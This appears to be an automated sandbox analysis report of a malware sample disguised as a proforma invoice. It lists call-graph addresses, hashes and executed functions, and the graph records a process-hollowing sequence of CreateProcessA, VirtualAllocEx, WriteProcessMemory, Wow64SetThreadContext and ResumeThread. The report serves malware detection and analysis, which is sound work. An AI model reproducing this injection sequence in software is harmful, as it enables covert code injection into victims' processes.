70724->70729 70735 4de6ce9 70724->70735 70726 727a907 70733 4de6d18 70729->70733 70730 4de6d52 70731 4de0ba0 KiUserCallbackDispatcher 70730->70731 70732 4de6d71 70731->70732 70732->70726 70733->70730 70741 4de6054 70733->70741 70739 4de6cf8 70735->70739 70736 4de6d52 70737 4de0ba0 KiUserCallbackDispatcher 70736->70737 70738 4de6d71 70737->70738 70738->70726 70739->70736 70740 4de6054 DrawTextExW 70739->70740 70740->70736 70742 4de605f 70741->70742 70743 4deaf4f 70742->70743 70746 4deaf68 70742->70746 70750 4deaf58 70742->70750 70743->70730 70747 4deaf71 70746->70747 70754 4deafa2 70747->70754 70748 4deaf96 70748->70743 70751 4deaf71 70750->70751 70753 4deafa2 DrawTextExW 70751->70753 70752 4deaf96 70752->70743 70753->70752 70755 4deafda 70754->70755 70756 4deafeb 70754->70756 70755->70748 70757 4deb079 70756->70757 70760 4deb2e0 70756->70760 70765 4deb2d0 70756->70765 70757->70748 70761 4deb308 70760->70761 70762 4deb40e 70761->70762 70770 4debb62 70761->70770 70775 4debb70 70761->70775 70762->70755 70766 4deb2d3 70765->70766 70767 4deb40e 70766->70767 70768 4debb62 DrawTextExW 70766->70768 70769 4debb70 DrawTextExW 70766->70769 70767->70755 70768->70767 70769->70767 70771 4debb70 70770->70771 70780 4debfd8 70771->70780 70784 4debfc8 70771->70784 70772 4debbfc 70772->70762 70776 4debb86 70775->70776 70778 4debfd8 DrawTextExW 70776->70778 70779 4debfc8 DrawTextExW 70776->70779 70777 4debbfc 70777->70762 70778->70777 70779->70777 70789 4dec420 70780->70789 70794 4dec410 70780->70794 70781 4debff6 70781->70772 70785 4debfcb 70784->70785 70787 4dec410 DrawTextExW 70785->70787 70788 4dec420 DrawTextExW 70785->70788 70786 4debff6 70786->70772 70787->70786 70788->70786 70790 4dec451 70789->70790 70791 4dec47e 70790->70791 70799 4dec4a0 70790->70799 70804 4dec490 70790->70804 70791->70781 70796 4dec415 70794->70796 70795 4dec47e 70795->70781 70796->70795 70797 4dec490 DrawTextExW 70796->70797 70798 4dec4a0 DrawTextExW 70796->70798 70797->70795 70798->70795 70801 4dec4c1 70799->70801 70800 4dec4d6 70800->70791 70801->70800 70809 4de9924 70801->70809 70803 4dec541 70806 4dec493 70804->70806 70805 4dec4d6 70805->70791 70806->70805 70807 4de9924 DrawTextExW 70806->70807 70808 4dec541 70807->70808 70810 4de992f 70809->70810 70811 4dee119 70810->70811 70813 4deec88 DrawTextExW 70810->70813 70814 4deec79 DrawTextExW 70810->70814 70811->70803 70812 4dee22c 70812->70803 70813->70812 70814->70812 70376 b06fb7e 70377 b06fb0c 70376->70377 70378 b06fb81 70376->70378 70392 b06fb3a 70377->70392 70394 b040305 70377->70394 70399 b04069b 70377->70399 70405 b0405d0 70377->70405 70410 b040832 70377->70410 70414 b040597 70377->70414 70418 b0405f7 70377->70418 70424 b0402b4 70377->70424 70428 b040254 70377->70428 70433 b04064c 70377->70433 70439 b04046a 70377->70439 70445 b0401a2 70377->70445 70450 b0405e3 70377->70450 70455 b0408c0 70377->70455 70460 b040122 70377->70460 70395 b04030b 70394->70395 70464 7271de0 70395->70464 70468 7271dd8 70395->70468 70396 b04033d 70396->70392 70400 b0406b6 70399->70400 70402 7271b30 ResumeThread 70400->70402 70403 7271b40 ResumeThread 70400->70403 70472 7271b98 70400->70472 70401 b040189 70401->70392 70402->70401 70403->70401 70406 b04026f 70405->70406 70476 7271ec9 70406->70476 70480 7271ed0 70406->70480 70407 b040a9f 70484 7271d19 70410->70484 70488 7271d20 70410->70488 70411 b040850 70411->70392 70492 7271c48 70414->70492 70496 7271c41 70414->70496 70415 b0405b1 70419 b04060f 70418->70419 70421 7271b30 ResumeThread 70419->70421 70422 7271b40 ResumeThread 70419->70422 70423 7271b98 ResumeThread 70419->70423 70420 b040189 70420->70392 70421->70420 70422->70420 70423->70420 70426 7271de0 WriteProcessMemory 70424->70426 70427 7271dd8 WriteProcessMemory 70424->70427 70425 b0402e6 70425->70392 70426->70425 70427->70425 70429 b04025e 70428->70429 70431 7271ed0 ReadProcessMemory 70429->70431 70432 7271ec9 ReadProcessMemory 70429->70432 70430 b040a9f 70431->70430 70432->70430 70434 b0405f6 70433->70434 70435 b040189 70433->70435 70436 7271b30 ResumeThread 70434->70436 70437 7271b40 ResumeThread 70434->70437 70438 7271b98 ResumeThread 70434->70438 70435->70392 70436->70435 70437->70435 70438->70435 70440 b040477 70439->70440 70442 7271b30 ResumeThread 70440->70442 70443 7271b40 ResumeThread 70440->70443 70444 7271b98 ResumeThread 70440->70444 70441 b040189 70441->70392 70442->70441 70443->70441 70444->70441 70446 b0403c8 70445->70446 70448 7271de0 WriteProcessMemory 70446->70448 70449 7271dd8 WriteProcessMemory 70446->70449 70447 b0403ef 70447->70392 70448->70447 70449->70447 70451 b04031c 70450->70451 70452 b04033d 70450->70452 70453 7271de0 WriteProcessMemory 70451->70453 70454 7271dd8 WriteProcessMemory 70451->70454 70452->70392 70453->70452 70454->70452 70456 b040a22 70455->70456 70458 7271c41 Wow64SetThreadContext 70456->70458 70459 7271c48 Wow64SetThreadContext 70456->70459 70457 b040a3d 70458->70457 70459->70457 70500 7272068 70460->70500 70504 727205c 70460->70504 70465 7271e28 WriteProcessMemory 70464->70465 70467 7271e7f 70465->70467 70467->70396 70469 7271de0 WriteProcessMemory 70468->70469 70471 7271e7f 70469->70471 70471->70396 70473 7271bd8 ResumeThread 70472->70473 70475 7271c09 70473->70475 70475->70401 70477 7271f1b ReadProcessMemory 70476->70477 70479 7271f5f 70477->70479 70479->70407 70481 7271f1b ReadProcessMemory 70480->70481 70483 7271f5f 70481->70483 70483->70407 70485 7271d20 VirtualAllocEx 70484->70485 70487 7271d9d 70485->70487 70487->70411 70489 7271d60 VirtualAllocEx 70488->70489 70491 7271d9d 70489->70491 70491->70411 70493 7271c8d Wow64SetThreadContext 70492->70493 70495 7271cd5 70493->70495 70495->70415 70497 7271c44 Wow64SetThreadContext 70496->70497 70499 7271cd5 70497->70499 70499->70415 70501 72720f1 CreateProcessA 70500->70501 70503 72722b3 70501->70503 70505 7272064 CreateProcessA 70504->70505 70507 72722b3 70505->70507

                                                                                            Executed Functions

                                                                                            Function 0727C09C Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 556COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 475 727c09c-727d825 478 727dd0d-727dd76 call 7276fb0 475->478 479 727d82b-727d838 475->479 483 727dd7d-727ddd4 call 7276fb0 478->483 482 727d83e-727d848 479->482 479->483 487 727d84e-727d858 482->487 488 727dddb-727de32 call 7276fb0 482->488 483->488 490 727d85e-727d868 487->490 491 727de39-727de90 call 7276fb0 487->491 488->491 493 727de97-727def4 call 7276fb0 490->493 494 727d86e-727d875 call 72750e8 490->494 491->493 506 727defb-727df69 call 7277138 493->506 494->506 507 727d87b-727d87f 494->507 570 727df71-727df73 506->570 571 727df6b-727df6f 506->571 510 727d8d6-727d92a call 727c0bc call 727c0cc GetCapture 507->510 511 727d881-727d8b6 507->511 537 727d933-727d941 510->537 538 727d92c-727d932 510->538 511->510 540 727d8b8-727d8c7 511->540 544 727d943-727d968 call 727c0dc 537->544 545 727d96d-727d9a2 GetActiveWindow 537->545 538->537 540->510 554 727d8c9-727d8d3 call 727c0ac 540->554 544->545 549 727d9a4-727d9aa 545->549 550 727d9ab-727d9bc 545->550 549->550 557 727d9be-727d9c9 550->557 558 727d9cb 550->558 554->510 564 727d9ce-727da00 557->564 558->564 576 727da15-727da38 564->576 577 727da02-727da08 564->577 572 727df78-727df86 570->572 571->572 582 727db00-727db0a 576->582 583 727da3e-727da48 576->583 577->576 578 727da0a-727da10 call 727c0e8 577->578 578->576 584 727db15-727db38 582->584 585 727db0c-727db0f call 727dfd8 582->585 583->582 588 727da4e-727da81 583->588 590 727db40-727db4e 584->590 591 727db3a-727db3d 584->591 585->584 595 727da87-727daf6 588->595 596 727dc53-727dcc9 call 7276fb0 call 727c0e8 588->596 597 727db84-727db92 590->597 598 727db50-727db5e 590->598 591->590 595->582 636 727dcce-727dce2 596->636 604 727db94-727dba2 597->604 605 727dbb0-727dbb7 597->605 598->597 603 727db60-727db82 call 727c0f8 598->603 603->605 604->605 612 727dba4-727dbab call 727c0f8 604->612 646 727dbbd call 7373db0 605->646 647 727dbbd call 7373da0 605->647 610 727dbc0-727dbd0 618 727dc25-727dc34 610->618 619 727dbd2-727dbdc 610->619 612->605 618->596 624 727dbde-727dbf1 call 727c104 619->624 625 727dc1a-727dc1f 619->625 624->625 631 727dbf3-727dc15 call 727c114 624->631 641 727dc22 call b06cbd0 625->641 642 727dc22 call b06cbf0 625->642 643 727dc22 call b06cc00 625->643 644 727dc22 call b06ce7c 625->644 631->625 636->478 641->618 642->618 643->618 644->618 646->610 647->610
                                                                                            APIs
                                                                                              • Part of subcall function 072750E8: GetProcessWindowStation.USER32(?,?,?,?,00000E20,?,?,0727D873), ref: 07275145
                                                                                            • GetCapture.USER32 ref: 0727D916
                                                                                            • GetActiveWindow.USER32 ref: 0727D98E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveCaptureProcessStation
                                                                                            • String ID: Hbq$Hbq
                                                                                            • API String ID: 2779997428-4258043069
                                                                                            • Opcode ID: 0e4c5491c5649b83b0f52595d140bf06406f07d4145c53dcb12c17ec01b78a46
                                                                                            • Instruction ID: d6ffcbde4b76f940ea198d6a913a25ff89b074c3f0f9eb457a44a57abf816c33
                                                                                            • Opcode Fuzzy Hash: 0e4c5491c5649b83b0f52595d140bf06406f07d4145c53dcb12c17ec01b78a46
                                                                                            • Instruction Fuzzy Hash: 6F225DB0B102198FDB14EBB9C550AAEBBF6BFC8300F248169D505AB395DF359D42CB51
                                                                                            Function 0727D7B1 Relevance: 3.3, APIs: 2, Instructions: 316COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 963 727d7b1-727d825 965 727dd0d-727dd76 call 7276fb0 963->965 966 727d82b-727d838 963->966 970 727dd7d-727ddd4 call 7276fb0 965->970 969 727d83e-727d848 966->969 966->970 974 727d84e-727d858 969->974 975 727dddb-727de32 call 7276fb0 969->975 970->975 977 727d85e-727d868 974->977 978 727de39-727de90 call 7276fb0 974->978 975->978 980 727de97-727def4 call 7276fb0 977->980 981 727d86e-727d875 call 72750e8 977->981 978->980 993 727defb-727df69 call 7277138 980->993 981->993 994 727d87b-727d87f 981->994 1057 727df71-727df73 993->1057 1058 727df6b-727df6f 993->1058 997 727d8d6-727d92a call 727c0bc call 727c0cc GetCapture 994->997 998 727d881-727d8b6 994->998 1024 727d933-727d941 997->1024 1025 727d92c-727d932 997->1025 998->997 1027 727d8b8-727d8c7 998->1027 1031 727d943-727d968 call 727c0dc 1024->1031 1032 727d96d-727d9a2 GetActiveWindow 1024->1032 1025->1024 1027->997 1041 727d8c9-727d8d3 call 727c0ac 1027->1041 1031->1032 1036 727d9a4-727d9aa 1032->1036 1037 727d9ab-727d9bc 1032->1037 1036->1037 1044 727d9be-727d9c9 1037->1044 1045 727d9cb 1037->1045 1041->997 1051 727d9ce-727da00 1044->1051 1045->1051 1063 727da15-727da38 1051->1063 1064 727da02-727da08 1051->1064 1059 727df78-727df86 1057->1059 1058->1059 1069 727db00-727db0a 1063->1069 1070 727da3e-727da48 1063->1070 1064->1063 1065 727da0a-727da10 call 727c0e8 1064->1065 1065->1063 1071 727db15-727db38 1069->1071 1072 727db0c-727db0f call 727dfd8 1069->1072 1070->1069 1075 727da4e-727da81 1070->1075 1077 727db40-727db4e 1071->1077 1078 727db3a-727db3d 1071->1078 1072->1071 1082 727da87-727daf6 1075->1082 1083 727dc53-727dcbc call 7276fb0 1075->1083 1084 727db84-727db92 1077->1084 1085 727db50-727db5e 1077->1085 1078->1077 1082->1069 1120 727dcc3-727dcc9 call 727c0e8 1083->1120 1091 727db94-727dba2 1084->1091 1092 727dbb0-727dbb7 1084->1092 1085->1084 1090 727db60-727db82 call 727c0f8 1085->1090 1090->1092 1091->1092 1099 727dba4-727dbab call 727c0f8 1091->1099 1133 727dbbd call 7373db0 1092->1133 1134 727dbbd call 7373da0 1092->1134 1097 727dbc0-727dbd0 1105 727dc25-727dc34 1097->1105 1106 727dbd2-727dbdc 1097->1106 1099->1092 1105->1083 1111 727dbde-727dbf1 call 727c104 1106->1111 1112 727dc1a-727dc1f 1106->1112 1111->1112 1118 727dbf3-727dc15 call 727c114 1111->1118 1128 727dc22 call b06cbd0 1112->1128 1129 727dc22 call b06cbf0 1112->1129 1130 727dc22 call b06cc00 1112->1130 1131 727dc22 call b06ce7c 1112->1131 1118->1112 1123 727dcce-727dce2 1120->1123 1123->965 1128->1105 1129->1105 1130->1105 1131->1105 1133->1097 1134->1097
                                                                                            APIs
                                                                                              • Part of subcall function 072750E8: GetProcessWindowStation.USER32(?,?,?,?,00000E20,?,?,0727D873), ref: 07275145
                                                                                            • GetCapture.USER32 ref: 0727D916
                                                                                            • GetActiveWindow.USER32 ref: 0727D98E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveCaptureProcessStation
                                                                                            • String ID:
                                                                                            • API String ID: 2779997428-0
                                                                                            • Opcode ID: d154ef4c1728f9e85b8825d45b866e7c5b073697d72f9a7d4e5473966f2bdc3b
                                                                                            • Instruction ID: 6dc7f2bee80d6b29f7be8ac4a950e59c557ed5a90e37ccaff291a94489811288
                                                                                            • Opcode Fuzzy Hash: d154ef4c1728f9e85b8825d45b866e7c5b073697d72f9a7d4e5473966f2bdc3b
                                                                                            • Instruction Fuzzy Hash: 2AD130B0E10219CFDB25DFB5CA54A9DBBF2FF89304F248269E405AB251DB31A985CF50
                                                                                            Function 0B0634F0 Relevance: 1.9, Strings: 1, Instructions: 696COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: fff?
                                                                                            • API String ID: 0-4136771917
                                                                                            • Opcode ID: fea517def5b6dc8e4a3495e688a7fdb44425e5933eb2b445de14db6a9c4f078b
                                                                                            • Instruction ID: c50d57e3f50e2b3684830e8c779e4a8f919a9a7c8b6cc3ffc261ea5f405b9109
                                                                                            • Opcode Fuzzy Hash: fea517def5b6dc8e4a3495e688a7fdb44425e5933eb2b445de14db6a9c4f078b
                                                                                            • Instruction Fuzzy Hash: C7624936810A1ADFCF11DF50C884AD9B7B2FF99304F1586D5E9086B125E771AAD6CF80
                                                                                            Function 0737ACE9 Relevance: 1.9, APIs: 1, Instructions: 369COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 13b6842450e5824914aa888e8237fecb366d2105e8edf0e8f5beff0ee562fdf0
                                                                                            • Instruction ID: 834dd11a31499c6807925c3338d65b782a6bd2829e43f9ce52da38c4c1c6bb34
                                                                                            • Opcode Fuzzy Hash: 13b6842450e5824914aa888e8237fecb366d2105e8edf0e8f5beff0ee562fdf0
                                                                                            • Instruction Fuzzy Hash: F0E15EB0A00209CFEB24DFA9C948BADFBF2BF49304F15C559E409AB261DB79D945CB41
                                                                                            Function 072744EC Relevance: 1.8, Strings: 1, Instructions: 555COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LR^q
                                                                                            • API String ID: 0-2625958711
                                                                                            • Opcode ID: d5c85f7dbdd295acddf54d118d4e337077679955012457afeed20c348ec4d23c
                                                                                            • Instruction ID: b598d44dfb8452dd95644e89944a664f28480a1fe9f0c21be064a6c68cbaa202
                                                                                            • Opcode Fuzzy Hash: d5c85f7dbdd295acddf54d118d4e337077679955012457afeed20c348ec4d23c
                                                                                            • Instruction Fuzzy Hash: 9A324DB0B002198FDB58EF29C9547EDB7F2AF88704F1481A895099B3A5DF359D82CF91
                                                                                            Function 0727655E Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q
                                                                                            • API String ID: 0-1614139903
                                                                                            • Opcode ID: 0627f39208f9027a002bb7ff52ec5487aa0906c07bc7c50a66cf5b69f5bdabd1
                                                                                            • Instruction ID: 9b798e2872c6bd9370c68f18c27e3a8b6f59b9a80fa2e404f9c557bd6e84cd9d
                                                                                            • Opcode Fuzzy Hash: 0627f39208f9027a002bb7ff52ec5487aa0906c07bc7c50a66cf5b69f5bdabd1
                                                                                            • Instruction Fuzzy Hash: 8B42F774A00218CFCB18EF28C995AD9B7F2FF89705F1581E9D509AB361DA31AD81CF61
                                                                                            Function 0B06E390 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Hbq
                                                                                            • API String ID: 0-1245868
                                                                                            • Opcode ID: 58fc10b54230408be8242a757234a9832c23e346c97ebef6ac6f89ba5619a5b0
                                                                                            • Instruction ID: a04f7be8f05e8640fb53a0717e5259b8bf75c643ad6a8a5e947be4147d1b5d08
                                                                                            • Opcode Fuzzy Hash: 58fc10b54230408be8242a757234a9832c23e346c97ebef6ac6f89ba5619a5b0
                                                                                            • Instruction Fuzzy Hash: 35E1FE717007008FDB29EB75C550BAEB7E6AF89780F14886DE14ACB291DF35D806CB52
                                                                                            Function 07275778 Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 38e12309e60514f450a56f8e1eaf9027efe3a0bd4360ebcd72a41a4dc1c3ac34
                                                                                            • Instruction ID: 990360ac58ddaca2f5caabfd94cde9b3f67888f612af45dda5c541942b3d1313
                                                                                            • Opcode Fuzzy Hash: 38e12309e60514f450a56f8e1eaf9027efe3a0bd4360ebcd72a41a4dc1c3ac34
                                                                                            • Instruction Fuzzy Hash: 99021A71E1021ACBDB14EF64C954BEDB7B2AF89300F10869AD44A6B290DF70AEC5CF51
                                                                                            Function 0B062870 Relevance: .6, Instructions: 635COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f75f9809a5e68c73ad1bc7b53610e051cf8dcb4bf606ae3236b9e08db6af92e
                                                                                            • Instruction ID: 2fe1a75b0448aa61228aedce8e282085b8bbdb3f439394614a59dcc53ab640bc
                                                                                            • Opcode Fuzzy Hash: 3f75f9809a5e68c73ad1bc7b53610e051cf8dcb4bf606ae3236b9e08db6af92e
                                                                                            • Instruction Fuzzy Hash: 1C524735900619CFDB65DF64C854AE9B7F2FF89340F1585E9E409AB261EB31EA82CF40
                                                                                            Function 0B0666A1 Relevance: .5, Instructions: 522COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1480ac1d875bcf782d924406473de6fc056e16b42fd7bc3727ea218ac8c58243
                                                                                            • Instruction ID: ff89c28d46b8e6b1f92373146958dc2ae2ac59f2388d4407adca213f6a2d29a8
                                                                                            • Opcode Fuzzy Hash: 1480ac1d875bcf782d924406473de6fc056e16b42fd7bc3727ea218ac8c58243
                                                                                            • Instruction Fuzzy Hash: 97322531A00619CFDB25DF64C944BD9B7F2FF89344F1585E9E809AB221EB71AA85CF40
                                                                                            Function 053CBC17 Relevance: .1, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772980852.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_53c0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d2341900f8087b8b98e5167adb09555486752a435d1dd2b2edc761005c777517
                                                                                            • Instruction ID: 6f765aba3dcfeb7182ff08f9ca7704fe0c444ec7c5f1bad7c87c7066dd253cf1
                                                                                            • Opcode Fuzzy Hash: d2341900f8087b8b98e5167adb09555486752a435d1dd2b2edc761005c777517
                                                                                            • Instruction Fuzzy Hash: E04136B0D092098FDB04CFAAD4556AEFFFAAB89301F54D0AAE409A7251DB384E41CF54
                                                                                            Function 053CC490 Relevance: .1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772980852.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_53c0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f33e1b29214e2435a831ff6007187cef68877625f065ad5ba7532986ad2924f5
                                                                                            • Instruction ID: 517fffea87d4a9faef0523b07ec257ea0abae9c557953ef5a26a1f8fcaa70484
                                                                                            • Opcode Fuzzy Hash: f33e1b29214e2435a831ff6007187cef68877625f065ad5ba7532986ad2924f5
                                                                                            • Instruction Fuzzy Hash: 3F317E71D042188BDB08CFAAC8402EEBFBBBF89310F14D5AAD41DB3261DB341D068B90
                                                                                            Function 00A5D111 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 756 a5d111-a5d1af GetCurrentProcess 760 a5d1b1-a5d1b7 756->760 761 a5d1b8-a5d1ec GetCurrentThread 756->761 760->761 762 a5d1f5-a5d229 GetCurrentProcess 761->762 763 a5d1ee-a5d1f4 761->763 765 a5d232-a5d24d call a5d6f8 762->765 766 a5d22b-a5d231 762->766 763->762 769 a5d253-a5d282 GetCurrentThreadId 765->769 766->765 770 a5d284-a5d28a 769->770 771 a5d28b-a5d2ed 769->771 770->771
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00A5D19E
                                                                                            • GetCurrentThread.KERNEL32 ref: 00A5D1DB
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00A5D218
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00A5D271
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769243295.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a50000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 122ead7cea47e09e1e921f2786e34c324f49b25498493d7bb31944dbfcc47568
                                                                                            • Instruction ID: ba199e78bc803fe95295e09a2316359a64190041265f1a4df029a86c569c55a9
                                                                                            • Opcode Fuzzy Hash: 122ead7cea47e09e1e921f2786e34c324f49b25498493d7bb31944dbfcc47568
                                                                                            • Instruction Fuzzy Hash: 9C5136B09006498FDB14CFA9D548BEEBBF1BF88304F24C459E459A7360DB749988CF65
                                                                                            Function 00A5D120 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 778 a5d120-a5d1af GetCurrentProcess 782 a5d1b1-a5d1b7 778->782 783 a5d1b8-a5d1ec GetCurrentThread 778->783 782->783 784 a5d1f5-a5d229 GetCurrentProcess 783->784 785 a5d1ee-a5d1f4 783->785 787 a5d232-a5d24d call a5d6f8 784->787 788 a5d22b-a5d231 784->788 785->784 791 a5d253-a5d282 GetCurrentThreadId 787->791 788->787 792 a5d284-a5d28a 791->792 793 a5d28b-a5d2ed 791->793 792->793
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00A5D19E
                                                                                            • GetCurrentThread.KERNEL32 ref: 00A5D1DB
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00A5D218
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00A5D271
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769243295.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a50000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 93e41f77a27b1f28758dbed5bdf56dbdaf72e7611e1701bf6264ea3baf01ad5c
                                                                                            • Instruction ID: 906acff6f6bacd5e0ffaa240d202a808b4fe2274ec9b651ff53a10129af6f638
                                                                                            • Opcode Fuzzy Hash: 93e41f77a27b1f28758dbed5bdf56dbdaf72e7611e1701bf6264ea3baf01ad5c
                                                                                            • Instruction Fuzzy Hash: 465145B09006098FDB14DFAAD548BDEBBF1BF88304F20C459E459A7360DB749988CF65
                                                                                            Function 073727C0 Relevance: 3.1, APIs: 2, Instructions: 98windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1135 73727c0-7372802 1136 7372804-737280f 1135->1136 1137 737287e-7372881 1135->1137 1136->1137 1144 7372811-7372837 GetFocus 1136->1144 1138 73728a6-73728a8 1137->1138 1140 73728b5-73728b7 1138->1140 1141 73728aa-73728b3 1138->1141 1142 73728d7-73728e4 1140->1142 1143 73728b9-73728c2 1140->1143 1141->1140 1150 7372883-737288f 1141->1150 1143->1142 1152 73728c4-73728d1 1143->1152 1146 7372840-7372849 1144->1146 1147 7372839-737283f 1144->1147 1148 7372860-737287c KiUserCallbackDispatcher 1146->1148 1149 737284b-737285e 1146->1149 1147->1146 1148->1142 1149->1142 1149->1148 1150->1140 1158 7372891-73728a4 1150->1158 1152->1142 1158->1138
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 07372826
